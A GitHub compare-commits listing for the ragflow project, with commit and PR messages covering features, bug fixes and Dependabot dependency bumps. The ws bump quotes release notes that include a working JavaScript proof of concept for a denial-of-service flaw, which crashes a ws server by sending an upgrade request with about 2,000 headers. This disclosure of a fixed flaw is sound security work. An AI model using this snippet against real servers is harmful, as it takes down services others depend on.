Compare commits

...

509 Commits

Author SHA1 Message Date
3fd7db40ea refine mindmap (#1817)
### What problem does this PR solve?

#1594
### Type of change

- [x] Refactoring
2024-08-06 09:24:53 +08:00
5650442b0b refine context length (#1813)
### What problem does this PR solve?

#1594
### Type of change

- [x] Performance Improvement
2024-08-05 18:22:01 +08:00
5b013da4d6 refine docs for 0.9.0 release (#1812)
### What problem does this PR solve?



### Type of change

- [x] Documentation Update
2024-08-05 18:10:10 +08:00
fe797bcc66 be better chunks before graphrag (#1811)
### What problem does this PR solve?

#1594

### Type of change

- [x] Refactoring
2024-08-05 16:21:52 +08:00
9542f4484c feat: Translate ForceGraph #162 (#1810)
### What problem does this PR solve?

feat: Translate ForceGraph #162

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-08-05 16:04:57 +08:00
2452c5624f remove duplicated key in mind map (#1809)
### What problem does this PR solve?

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-08-05 15:57:33 +08:00
a5c03ccd4c refine mindmap prompt (#1808)
### What problem does this PR solve?



### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-08-05 15:33:44 +08:00
H
d2213141e0 Fix graphrag callback (#1806)
### What problem does this PR solve?

#1800 

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-08-05 14:44:54 +08:00
3da3260eb5 fix: Fixed the issue that the related form value does not change after selecting the freedom field of the model #1804 (#1805)
### What problem does this PR solve?
fix: Fixed the issue that the related form value does not change after
selecting the freedom field of the model #1804

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-08-05 12:03:47 +08:00
07f283b73e refine Dockerfile (#1802)
### What problem does this PR solve?

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-08-05 09:38:51 +08:00
29509ff69d refine dockerfile (#1801)
### What problem does this PR solve?


### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-08-05 08:58:22 +08:00
216f6495c4 feat: Fixed the issue where the page reports an error when the graph returned by the interface is empty #162 (#1795)
…returned by the interface is empty #162

### What problem does this PR solve?

feat: Fixed the issue where the page reports an error when the graph
returned by the interface is empty #162

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-08-03 06:42:48 +08:00
f60a249fe1 readme update (#1794)
### What problem does this PR solve?


### Type of change

- [x] Documentation Update
2024-08-02 19:16:04 +08:00
152072f900 Add graphrag (#1793)
### What problem does this PR solve?

#1594

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-08-02 18:51:14 +08:00
80032b1fc0 feat: Add IndentedTree #162 (#1792)
### What problem does this PR solve?

feat: Add IndentedTree #162

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-08-02 18:48:53 +08:00
H
5d55e6a049 Add component google scholar (#1790)
### What problem does this PR solve?

#1739 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-08-02 17:34:38 +08:00
418700b455 fix: Rename graph to agent #918 (#1785)
### What problem does this PR solve?

fix: Rename graph to agent #918

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-08-02 14:45:51 +08:00
eea6565472 fix: TypeError: Cannot read properties of undefined (reading 'viewport' #1761 (#1784)
### What problem does this PR solve?

fix: TypeError: Cannot read properties of undefined (reading 'viewport'
#1761

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-08-02 11:22:10 +08:00
3f21603558 feat: Hide KnowledgeGraphModal #162 (#1783)
### What problem does this PR solve?
feat: Hide KnowledgeGraphModal #162

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-08-02 10:40:56 +08:00
3a739e3dd7 feat: Add EntityTypesForm #162 (#1777)
### What problem does this PR solve?
feat: Add EntityTypesForm #162

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-08-02 10:03:05 +08:00
4ba1ba973a fix jina module not find bug (#1779)
### What problem does this PR solve?

fix jina module not find bug

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)

Co-authored-by: Zhedong Cen <cenzhedong2@126.com>
2024-08-01 19:52:56 +08:00
e8b9871fb9 feat: Alter style of ForceGraph #162 (#1774)
### What problem does this PR solve?

feat: alter style of ForceGraph #162
### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-08-01 19:24:03 +08:00
e37b0d217d feat: Add KnowledgeGraphModal #162 (#1766)
### What problem does this PR solve?

feat: Add KnowledgeGraphModal #162

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-08-01 17:27:27 +08:00
50e9df4c76 fix jina module not find bug (#1770)
### What problem does this PR solve?

fix jina module not find bug

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)

Co-authored-by: Zhedong Cen <cenzhedong2@126.com>
2024-08-01 17:26:11 +08:00
b9a50ef4b8 API: retrieval api (#1763)
### What problem does this PR solve?

Add retrieval api on a specific knowledge base


![ragflow](https://github.com/user-attachments/assets/dc30a4c3-03c5-4d34-bb7c-60b8830f1225)

https://github.com/infiniflow/ragflow/issues/1102

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-08-01 13:20:53 +08:00
da11a20c92 trival (#1760)
### What problem does this PR solve?

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-08-01 09:07:37 +08:00
955619c8ac feat: Increase the distance between nodes #162 (#1758)
### What problem does this PR solve?

feat: Increase the distance between nodes #162

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-31 19:21:16 +08:00
ad2e116367 feat: Classify nodes based on edge relationships #162 (#1755)
### What problem does this PR solve?
feat: Add ForceGraph
feat: Classify nodes based on edge relationships #162 

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-31 17:45:52 +08:00
ccbd4365be refactor stepfun cv model (#1751)
### What problem does this PR solve?

refactor stepfun cv model

### Type of change

- [x] Refactoring

Co-authored-by: Zhedong Cen <cenzhedong2@126.com>
2024-07-31 15:30:47 +08:00
9169643157 add step-1v-8k cv model (#1686)
### What problem does this PR solve?

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._

### Type of change

- [x] New Feature (non-breaking change which adds functionality)

---------

Co-authored-by: lijianyong <lijianyong@stepfun.com>
2024-07-30 16:57:27 +08:00
5cff780ec4 lower openai version in requirements.txt (#1747)
### What problem does this PR solve?

lower openai version in requirements.txt

### Type of change

- [x] Refactoring

Co-authored-by: Zhedong Cen <cenzhedong2@126.com>
2024-07-30 16:55:59 +08:00
ceb0419fe5 fix: delete chunk by @tanstack/react-query #1306 (#1749)
### What problem does this PR solve?
fix: delete chunk by @tanstack/react-query #1306

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-30 16:55:00 +08:00
74ebc497c1 fix: ERROR: 'CompletionUsage' object has no attribute 'get' (#1736)
### What problem does this PR solve?

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-30 15:12:16 +08:00
161cb08bbd feat: Add bing and google operator #918 (#1745)
### What problem does this PR solve?

feat: Add bing and google operator #918

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-30 15:06:29 +08:00
ff8702f7de add support for LocalLLM (#1744)
### What problem does this PR solve?

add support for LocalLLM

### Type of change

- [x] New Feature (non-breaking change which adds functionality)

---------

Co-authored-by: Zhedong Cen <cenzhedong2@126.com>
2024-07-30 14:07:00 +08:00
a973b9e01f Fix: Embedding err when docx contains unsupported images (#1720)
### What problem does this PR solve?

Fix the problem of not being able to embedding when docx document
contains unsupported images.

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)

---------

Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
2024-07-29 19:38:47 +08:00
5e19423d82 support reset the user email (#1735)
### What problem does this PR solve?

support reset the user email from old to new
#1723 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-07-29 19:36:16 +08:00
29f7f8b81e fix MiniMax chat bug (#1733)
### What problem does this PR solve?

#1717   fix MiniMax chat bug

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)

Co-authored-by: Zhedong Cen <cenzhedong2@126.com>
2024-07-29 19:35:16 +08:00
H
6012f376ca Add component google,Bing (#1737)
### What problem does this PR solve?

### Type of change

- [x] New Feature (non-breaking change which adds functionality)

---------

Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
2024-07-29 19:26:16 +08:00
8468031e39 fix: Fetch chunk list by @tanstack/react-query #1306 (#1738)
### What problem does this PR solve?

fix: Fetch chunk list by @tanstack/react-query #1306

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-29 19:20:13 +08:00
H
aac460ad29 Fix index=true (#1734)
### What problem does this PR solve?

### Type of change

- [x] Refactoring
---------

Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
2024-07-29 19:19:54 +08:00
753c13d76f fix add local vision llm error when cannot download test pic (#1732)
### What problem does this PR solve?

#1726   fix add local vision llm  error when cannot download test pic

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)

Co-authored-by: Zhedong Cen <cenzhedong2@126.com>
2024-07-29 11:52:59 +08:00
H
0cb588f7bf Fix docx parser line bug (#1715)
### What problem does this PR solve?
#1704 

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)

---------

Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
2024-07-29 10:06:02 +08:00
ebdd71ce68 fix: When parsing the bold content in PDF, the result is duplicated. (#1729)
### What problem does this PR solve?

_fix: When parsing the bold content in PDF, the result is duplicated._

the detail: [When using OCR to recognize Chinese titles, the structure
appears to be
duplicated](https://github.com/infiniflow/ragflow/issues/1718)

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-29 09:43:05 +08:00
H
013856b604 Fix multiple generate (#1722)
### What problem does this PR solve?

#1625 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-07-29 09:27:59 +08:00
61096596bc fix OpenAI llm return bug (#1728)
### What problem does this PR solve?

fix OpenAI llm return bug

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-29 09:21:31 +08:00
549d67e281 fix: test chunk by @tanstack/react-query #1306 (#1719)
### What problem does this PR solve?

fix: test chunk by @tanstack/react-query #1306

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-26 19:00:19 +08:00
H
79c873344b Fix docs parser (#1714)
### What problem does this PR solve?

#1711 

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-26 10:52:56 +08:00
548f01850f Add Kibana component for Elasticsearch (#1710)
### What problem does this PR solve?
Add Kibana component for Elasticsearch

### Type of change

- [ ] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)

---------

Co-authored-by: Theta Wang (ncu) <chunshan.connect@gmail.com>
2024-07-26 10:34:35 +08:00
3f495b2d22 fix: Remove kAModel #1306 (#1713)
### What problem does this PR solve?

fix: Remove kAModel #1306
### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-26 10:23:51 +08:00
H
c943517932 Fix pdfparser error (#1707)
### What problem does this PR solve?

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-25 18:54:36 +08:00
935687998e fix: fetch user by @tanstack/react-query #1306 (#1709)
### What problem does this PR solve?

fix: fetch user by @tanstack/react-query #1306

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-25 18:53:10 +08:00
375f621405 fix: fetch llm list by @tanstack/react-query #1306 (#1708)
### What problem does this PR solve?

fix: fetch llm list by @tanstack/react-query #1306

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-25 18:06:39 +08:00
a99d19bdea fix: alter Arxiv to ArXiv #918 (#1705)
### What problem does this PR solve?
fix: alter Arxiv to ArXiv #918
### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-25 15:07:05 +08:00
906c0c5c89 fix: Set the default value of Self RAG to false #1220 (#1702)
### What problem does this PR solve?

fix: Set the default value of Self RAG  to false #1220
fix: Change all tool file names to kebab format

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-25 14:38:17 +08:00
c92d334b29 fix bug of regx (#1703)
### What problem does this PR solve?

#1689

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-25 14:30:58 +08:00
d38f995ba6 fix: Fix for Empty Reference Array Causing Errors (#1652)
### What problem does this PR solve?

This pull request addresses an issue where the reference is an empty
array ([]) in specific cases, leading to errors in the application. When
the reference is empty, the code attempts to call the get method on a
list, resulting in the following error message:
``` json
{"retcode": 500, "retmsg": "'list' object has no attribute 'get'", "data": {"answer": "**ERROR**: 'list' object has no attribute 'get'", "reference": []}}
```

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)

Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
2024-07-25 14:14:42 +08:00
bc50f68127 fix embedding_model (#1698)
### What problem does this PR solve?
fix embedding_model #1692
### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)

Signed-off-by: seaver <zhudan187@qq.com>
2024-07-25 11:43:43 +08:00
H
b24abee364 Fix pdfparser content confusion (#1700)
### What problem does this PR solve?

#1407 #1656 

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-25 11:40:23 +08:00
6fee2962cb fix: Limit the length of the new password input box to no less than 8 #1634 (#1696)
### What problem does this PR solve?

fix: Limit the length of the new password input box to no less than 8
#1634

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-25 11:02:24 +08:00
e67bfca552 refactor some llm api using openai api format (#1692)
### What problem does this PR solve?

refactor some llm api using openai api format

### Type of change

- [x] Refactoring

---------

Co-authored-by: Zhedong Cen <cenzhedong2@126.com>
2024-07-25 10:23:35 +08:00
d5f87a5498 fix: Set the default language to English #1306 (#1694)
### What problem does this PR solve?
fix: Set the default language to English #1306

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-24 19:19:13 +08:00
d7426d86d5 fix: Fixed an issue where the project could not be built #1306 (#1693)
### What problem does this PR solve?

fix: Fixed an issue where the project could not be built #1306

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-24 18:27:03 +08:00
7ca98848ac fix: Login with @tanstack/react-query #1306 (#1691)
### What problem does this PR solve?

fix: Login with @tanstack/react-query #1306

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-24 18:02:58 +08:00
32d5885b68 Fix api reference empty bug (#1655)
### What problem does this PR solve?

fix api reference empty bug
```
for chunk_i in answer['reference'].get('chunks',[]):
                   ^^^^^^^^^^^^^^^^^^^^^^^
AttributeError: 'list' object has no attribute 'get'
```
```
return np.array([d["relevance_score"] for d in res["results"]]), res["meta"]["tokens"]["input_tokens"]+res["meta"]["tokens"]["output_tokens"]
                                                   ~~~^^^^^^^^^^^
KeyError: 'results'
```
### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-24 18:02:22 +08:00
f4d182e4ee build(deps-dev): bump ws from 8.17.0 to 8.18.0 in /web (#1668)
Bumps [ws](https://github.com/websockets/ws) from 8.17.0 to 8.18.0.
<details>
<summary>Release notes</summary>
<p><em>Sourced from <a
href="https://github.com/websockets/ws/releases">ws's
releases</a>.</em></p>
<blockquote>
<h2>8.18.0</h2>
<h1>Features</h1>
<ul>
<li>Added support for <code>Blob</code> (<a
href="https://redirect.github.com/websockets/ws/issues/2229">#2229</a>).</li>
</ul>
<h2>8.17.1</h2>
<h1>Bug fixes</h1>
<ul>
<li>Fixed a DoS vulnerability (<a
href="https://redirect.github.com/websockets/ws/issues/2231">#2231</a>).</li>
</ul>
<p>A request with a number of headers exceeding
the[<code>server.maxHeadersCount</code>][]
threshold could be used to crash a ws server.</p>
<pre lang="js"><code>const http = require('http');
const WebSocket = require('ws');
<p>const wss = new WebSocket.Server({ port: 0 }, function () {
const chars =
&quot;!#$%&amp;'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~&quot;.split('');
const headers = {};
let count = 0;</p>
<p>for (let i = 0; i &lt; chars.length; i++) {
if (count === 2000) break;</p>
<pre><code>for (let j = 0; j &amp;lt; chars.length; j++) {
  const key = chars[i] + chars[j];
  headers[key] = 'x';

  if (++count === 2000) break;
}
</code></pre>
<p>}</p>
<p>headers.Connection = 'Upgrade';
headers.Upgrade = 'websocket';
headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
headers['Sec-WebSocket-Version'] = '13';</p>
<p>const request = http.request({
headers: headers,
host: '127.0.0.1',
port: wss.address().port
});</p>
<p>request.end();
});
</code></pre></p>
<p>The vulnerability was reported by <a
href="https://github.com/rrlapointe">Ryan LaPointe</a> in <a
href="https://redirect.github.com/websockets/ws/issues/2230">websockets/ws#2230</a>.</p>
<!-- raw HTML omitted -->
</blockquote>
<p>... (truncated)</p>
</details>
<details>
<summary>Commits</summary>
<ul>
<li><a
href="976c53c406"><code>976c53c</code></a>
[dist] 8.18.0</li>
<li><a
href="59b9629b78"><code>59b9629</code></a>
[feature] Add support for <code>Blob</code> (<a
href="https://redirect.github.com/websockets/ws/issues/2229">#2229</a>)</li>
<li><a
href="0d1b5e6c4a"><code>0d1b5e6</code></a>
[security] Use more descriptive text for 2017 vulnerability link</li>
<li><a
href="15f11a052a"><code>15f11a0</code></a>
[security] Add new DoS vulnerability to SECURITY.md</li>
<li><a
href="3c56601092"><code>3c56601</code></a>
[dist] 8.17.1</li>
<li><a
href="e55e5106f1"><code>e55e510</code></a>
[security] Fix crash when the Upgrade header cannot be read (<a
href="https://redirect.github.com/websockets/ws/issues/2231">#2231</a>)</li>
<li><a
href="6a00029edd"><code>6a00029</code></a>
[test] Increase code coverage</li>
<li><a
href="ddfe4a804d"><code>ddfe4a8</code></a>
[perf] Reduce the amount of <code>crypto.randomFillSync()</code>
calls</li>
<li>See full diff in <a
href="https://github.com/websockets/ws/compare/8.17.0...8.18.0">compare
view</a></li>
</ul>
</details>
<br />


[![Dependabot compatibility
score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=ws&package-manager=npm_and_yarn&previous-version=8.17.0&new-version=8.18.0)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)

Dependabot will resolve any conflicts with this PR as long as you don't
alter it yourself. You can also trigger a rebase manually by commenting
`@dependabot rebase`.

[//]: # (dependabot-automerge-start)
[//]: # (dependabot-automerge-end)

---

<details>
<summary>Dependabot commands and options</summary>
<br />

You can trigger Dependabot actions by commenting on this PR:
- `@dependabot rebase` will rebase this PR
- `@dependabot recreate` will recreate this PR, overwriting any edits
that have been made to it
- `@dependabot merge` will merge this PR after your CI passes on it
- `@dependabot squash and merge` will squash and merge this PR after
your CI passes on it
- `@dependabot cancel merge` will cancel a previously requested merge
and block automerging
- `@dependabot reopen` will reopen this PR if it is closed
- `@dependabot close` will close this PR and stop Dependabot recreating
it. You can achieve the same result by closing it manually
- `@dependabot show <dependency name> ignore conditions` will show all
of the ignore conditions of the specified dependency
- `@dependabot ignore this major version` will close this PR and stop
Dependabot creating any more for this major version (unless you reopen
the PR or upgrade to it yourself)
- `@dependabot ignore this minor version` will close this PR and stop
Dependabot creating any more for this minor version (unless you reopen
the PR or upgrade to it yourself)
- `@dependabot ignore this dependency` will close this PR and stop
Dependabot creating any more for this dependency (unless you reopen the
PR or upgrade to it yourself)
You can disable automated security fix PRs for this repo from the
[Security Alerts
page](https://github.com/infiniflow/ragflow/network/alerts).

</details>

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
2024-07-24 16:43:52 +08:00
69b9581417 build(deps): bump follow-redirects from 1.15.4 to 1.15.6 in /web (#1678)
Bumps
[follow-redirects](https://github.com/follow-redirects/follow-redirects)
from 1.15.4 to 1.15.6.
<details>
<summary>Commits</summary>
<ul>
<li><a
href="35a517c586"><code>35a517c</code></a>
Release version 1.15.6 of the npm package.</li>
<li><a
href="c4f847f851"><code>c4f847f</code></a>
Drop Proxy-Authorization across hosts.</li>
<li><a
href="8526b4a1b2"><code>8526b4a</code></a>
Use GitHub for disclosure.</li>
<li><a
href="b1677ce001"><code>b1677ce</code></a>
Release version 1.15.5 of the npm package.</li>
<li><a
href="d8914f7982"><code>d8914f7</code></a>
Preserve fragment in responseUrl.</li>
<li>See full diff in <a
href="https://github.com/follow-redirects/follow-redirects/compare/v1.15.4...v1.15.6">compare
view</a></li>
</ul>
</details>
<br />


[![Dependabot compatibility
score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=follow-redirects&package-manager=npm_and_yarn&previous-version=1.15.4&new-version=1.15.6)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)

Dependabot will resolve any conflicts with this PR as long as you don't
alter it yourself. You can also trigger a rebase manually by commenting
`@dependabot rebase`.

[//]: # (dependabot-automerge-start)
[//]: # (dependabot-automerge-end)

---

<details>
<summary>Dependabot commands and options</summary>
<br />

You can trigger Dependabot actions by commenting on this PR:
- `@dependabot rebase` will rebase this PR
- `@dependabot recreate` will recreate this PR, overwriting any edits
that have been made to it
- `@dependabot merge` will merge this PR after your CI passes on it
- `@dependabot squash and merge` will squash and merge this PR after
your CI passes on it
- `@dependabot cancel merge` will cancel a previously requested merge
and block automerging
- `@dependabot reopen` will reopen this PR if it is closed
- `@dependabot close` will close this PR and stop Dependabot recreating
it. You can achieve the same result by closing it manually
- `@dependabot show <dependency name> ignore conditions` will show all
of the ignore conditions of the specified dependency
- `@dependabot ignore this major version` will close this PR and stop
Dependabot creating any more for this major version (unless you reopen
the PR or upgrade to it yourself)
- `@dependabot ignore this minor version` will close this PR and stop
Dependabot creating any more for this minor version (unless you reopen
the PR or upgrade to it yourself)
- `@dependabot ignore this dependency` will close this PR and stop
Dependabot creating any more for this dependency (unless you reopen the
PR or upgrade to it yourself)
You can disable automated security fix PRs for this repo from the
[Security Alerts
page](https://github.com/infiniflow/ragflow/network/alerts).

</details>

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
2024-07-24 16:43:40 +08:00
1e21056364 build(deps-dev): bump axios from 0.27.2 to 1.7.2 in /web (#1679)
Bumps [axios](https://github.com/axios/axios) from 0.27.2 to 1.7.2.
<details>
<summary>Release notes</summary>
<p><em>Sourced from <a
href="https://github.com/axios/axios/releases">axios's
releases</a>.</em></p>
<blockquote>
<h2>Release v1.7.2</h2>
<h2>Release notes:</h2>
<h3>Bug Fixes</h3>
<ul>
<li><strong>fetch:</strong> enhance fetch API detection; (<a
href="https://redirect.github.com/axios/axios/issues/6413">#6413</a>)
(<a
href="4f79aef81b">4f79aef</a>)</li>
</ul>
<h3>Contributors to this release</h3>
<ul>
<li><!-- raw HTML omitted --> <a
href="https://github.com/DigitalBrainJS" title="+3/-3
([#6413](https://github.com/axios/axios/issues/6413) )">Dmitriy
Mozgovoy</a></li>
</ul>
<h2>Release v1.7.1</h2>
<h2>Release notes:</h2>
<h3>Bug Fixes</h3>
<ul>
<li><strong>fetch:</strong> fixed ReferenceError issue when TextEncoder
is not available in the environment; (<a
href="https://redirect.github.com/axios/axios/issues/6410">#6410</a>)
(<a
href="733f15fe5b">733f15f</a>)</li>
</ul>
<h3>Contributors to this release</h3>
<ul>
<li><!-- raw HTML omitted --> <a
href="https://github.com/DigitalBrainJS" title="+14/-9
([#6410](https://github.com/axios/axios/issues/6410) )">Dmitriy
Mozgovoy</a></li>
</ul>
<h2>Release v1.7.0</h2>
<h2>Release notes:</h2>
<h3>Features</h3>
<ul>
<li><strong>adapter:</strong> add fetch adapter; (<a
href="https://redirect.github.com/axios/axios/issues/6371">#6371</a>)
(<a
href="a3ff99b59d">a3ff99b</a>)</li>
</ul>
<h3>Bug Fixes</h3>
<ul>
<li><strong>core/axios:</strong> handle un-writable error stack (<a
href="https://redirect.github.com/axios/axios/issues/6362">#6362</a>)
(<a
href="81e0455b7b">81e0455</a>)</li>
</ul>
<h3>Contributors to this release</h3>
<ul>
<li><!-- raw HTML omitted --> <a
href="https://github.com/DigitalBrainJS" title="+1015/-127
([#6371](https://github.com/axios/axios/issues/6371) )">Dmitriy
Mozgovoy</a></li>
<li><!-- raw HTML omitted --> <a href="https://github.com/jasonsaayman"
title="+30/-14 ()">Jay</a></li>
<li><!-- raw HTML omitted --> <a
href="https://github.com/alexandre-abrioux" title="+56/-6
([#6362](https://github.com/axios/axios/issues/6362) )">Alexandre
ABRIOUX</a></li>
</ul>
<h2>Release v1.7.0-beta.2</h2>
<h2>Release notes:</h2>
<h3>Bug Fixes</h3>
<ul>
<li><strong>fetch:</strong> capitalize HTTP method names; (<a
href="https://redirect.github.com/axios/axios/issues/6395">#6395</a>)
(<a
href="ad3174a351">ad3174a</a>)</li>
<li><strong>fetch:</strong> fix &amp; optimize progress capturing for
cases when the request data has a nullish value or zero data length (<a
href="https://redirect.github.com/axios/axios/issues/6400">#6400</a>)
(<a
href="95a3e8e346">95a3e8e</a>)</li>
<li><strong>fetch:</strong> fix headers getting from a stream response;
(<a
href="https://redirect.github.com/axios/axios/issues/6401">#6401</a>)
(<a
href="870e0a76f6">870e0a7</a>)</li>
</ul>
<h3>Contributors to this release</h3>
<ul>
<li><!-- raw HTML omitted --> <a
href="https://github.com/DigitalBrainJS" title="+99/-46
([#6405](https://github.com/axios/axios/issues/6405)
[#6404](https://github.com/axios/axios/issues/6404)
[#6401](https://github.com/axios/axios/issues/6401)
[#6400](https://github.com/axios/axios/issues/6400)
[#6395](https://github.com/axios/axios/issues/6395) )">Dmitriy
Mozgovoy</a></li>
</ul>
<h2>Release v1.7.0-beta.1</h2>
<h2>Release notes:</h2>
<!-- raw HTML omitted -->
</blockquote>
<p>... (truncated)</p>
</details>
<details>
<summary>Changelog</summary>
<p><em>Sourced from <a
href="https://github.com/axios/axios/blob/v1.x/CHANGELOG.md">axios's
changelog</a>.</em></p>
<blockquote>
<h2><a
href="https://github.com/axios/axios/compare/v1.7.1...v1.7.2">1.7.2</a>
(2024-05-21)</h2>
<h3>Bug Fixes</h3>
<ul>
<li><strong>fetch:</strong> enhance fetch API detection; (<a
href="https://redirect.github.com/axios/axios/issues/6413">#6413</a>)
(<a
href="4f79aef81b">4f79aef</a>)</li>
</ul>
<h3>Contributors to this release</h3>
<ul>
<li><!-- raw HTML omitted --> <a
href="https://github.com/DigitalBrainJS" title="+3/-3
([#6413](https://github.com/axios/axios/issues/6413) )">Dmitriy
Mozgovoy</a></li>
</ul>
<h2><a
href="https://github.com/axios/axios/compare/v1.7.0...v1.7.1">1.7.1</a>
(2024-05-20)</h2>
<h3>Bug Fixes</h3>
<ul>
<li><strong>fetch:</strong> fixed ReferenceError issue when TextEncoder
is not available in the environment; (<a
href="https://redirect.github.com/axios/axios/issues/6410">#6410</a>)
(<a
href="733f15fe5b">733f15f</a>)</li>
</ul>
<h3>Contributors to this release</h3>
<ul>
<li><!-- raw HTML omitted --> <a
href="https://github.com/DigitalBrainJS" title="+14/-9
([#6410](https://github.com/axios/axios/issues/6410) )">Dmitriy
Mozgovoy</a></li>
</ul>
<h1><a
href="https://github.com/axios/axios/compare/v1.7.0-beta.2...v1.7.0">1.7.0</a>
(2024-05-19)</h1>
<h3>Features</h3>
<ul>
<li><strong>adapter:</strong> add fetch adapter; (<a
href="https://redirect.github.com/axios/axios/issues/6371">#6371</a>)
(<a
href="a3ff99b59d">a3ff99b</a>)</li>
</ul>
<h3>Bug Fixes</h3>
<ul>
<li><strong>core/axios:</strong> handle un-writable error stack (<a
href="https://redirect.github.com/axios/axios/issues/6362">#6362</a>)
(<a
href="81e0455b7b">81e0455</a>)</li>
</ul>
<h3>Contributors to this release</h3>
<ul>
<li><!-- raw HTML omitted --> <a
href="https://github.com/DigitalBrainJS" title="+1015/-127
([#6371](https://github.com/axios/axios/issues/6371) )">Dmitriy
Mozgovoy</a></li>
<li><!-- raw HTML omitted --> <a href="https://github.com/jasonsaayman"
title="+30/-14 ()">Jay</a></li>
<li><!-- raw HTML omitted --> <a
href="https://github.com/alexandre-abrioux" title="+56/-6
([#6362](https://github.com/axios/axios/issues/6362) )">Alexandre
ABRIOUX</a></li>
</ul>
<h1><a
href="https://github.com/axios/axios/compare/v1.7.0-beta.1...v1.7.0-beta.2">1.7.0-beta.2</a>
(2024-05-19)</h1>
<h3>Bug Fixes</h3>
<ul>
<li><strong>fetch:</strong> capitalize HTTP method names; (<a
href="https://redirect.github.com/axios/axios/issues/6395">#6395</a>)
(<a
href="ad3174a351">ad3174a</a>)</li>
<li><strong>fetch:</strong> fix &amp; optimize progress capturing for
cases when the request data has a nullish value or zero data length (<a
href="https://redirect.github.com/axios/axios/issues/6400">#6400</a>)
(<a
href="95a3e8e346">95a3e8e</a>)</li>
<li><strong>fetch:</strong> fix headers getting from a stream response;
(<a
href="https://redirect.github.com/axios/axios/issues/6401">#6401</a>)
(<a
href="870e0a76f6">870e0a7</a>)</li>
</ul>
<h3>Contributors to this release</h3>
<!-- raw HTML omitted -->
</blockquote>
<p>... (truncated)</p>
</details>
<details>
<summary>Commits</summary>
<ul>
<li><a
href="0e4f9fa290"><code>0e4f9fa</code></a>
chore(release): v1.7.2 (<a
href="https://redirect.github.com/axios/axios/issues/6414">#6414</a>)</li>
<li><a
href="4f79aef81b"><code>4f79aef</code></a>
fix(fetch): enhance fetch API detection; (<a
href="https://redirect.github.com/axios/axios/issues/6413">#6413</a>)</li>
<li><a
href="67d1373131"><code>67d1373</code></a>
chore(release): v1.7.1 (<a
href="https://redirect.github.com/axios/axios/issues/6411">#6411</a>)</li>
<li><a
